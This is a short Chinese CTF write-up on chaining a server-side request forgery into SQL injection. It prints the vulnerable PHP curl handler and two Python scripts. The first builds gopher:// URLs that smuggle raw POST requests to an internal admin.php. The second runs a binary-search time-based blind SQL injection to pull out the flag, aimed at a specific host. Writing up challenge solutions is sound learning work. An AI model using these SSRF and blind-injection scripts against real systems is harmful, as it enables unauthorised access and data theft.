第一次遇到ssrf打sql注入吧
index.php的代码
<?php
highlight_file(__FILE__);
session_start();
$url = $_GET['url'] ?? false;
if($url)
{
$a = preg_match("/file|dict/i", $url);
if ($a==1)
{
exit();
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}
?>
师傅们说是扫出了admin.php (我没扫出。。。。)
叫我们传poc
明显的ssrf,然后配合题目 阔以想到ssrf打sql
然后后面就是怎么构造payload的问题了。。。
最后尝试是括号闭合,师傅们真的强
然后没有反应就时间盲注了。。。
import urllib
import requests
payload="poc=0) or sleep(3) #"
test =\
"""POST /admin.php HTTP/1.1
Host:127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Connection: close
%s
""" % (len(payload),payload)
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')
new = new.replace('%','%25')
result ='_' +new
url = 'http://121.36.147.29:20001/?url=gopher://127.0.0.1:80/'+result
print(url)
import urllib
import requests
import time
url='http://121.36.147.29:20001/?url='
flag=''
for i in range(1,100):
low=32
high=128
mid=(low+high)//2
while low<high:
payload="poc=0) or if((ascii(substr((select flag from flag),{},1)))>{},sleep(0.5),1) #".format(i,mid)
test =\
"""POST /admin.php HTTP/1.1
Host:127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Connection: close
%s
""" % (len(payload),payload)
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')
new = new.replace('%','%25')
result ='_' +new
url = 'http://121.36.147.29:20001/?url=gopher://127.0.0.1:80/'+result
print(url)
time1=time.time()
r=requests.get(url)
time2=time.time()
print(low,mid,high)
print(time2-time1)
if time2-time1>0.4:
low=mid+1
else:
high=mid
mid=(low+high)//2
flag+=chr(mid)
print(flag)
扫一扫
7068
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
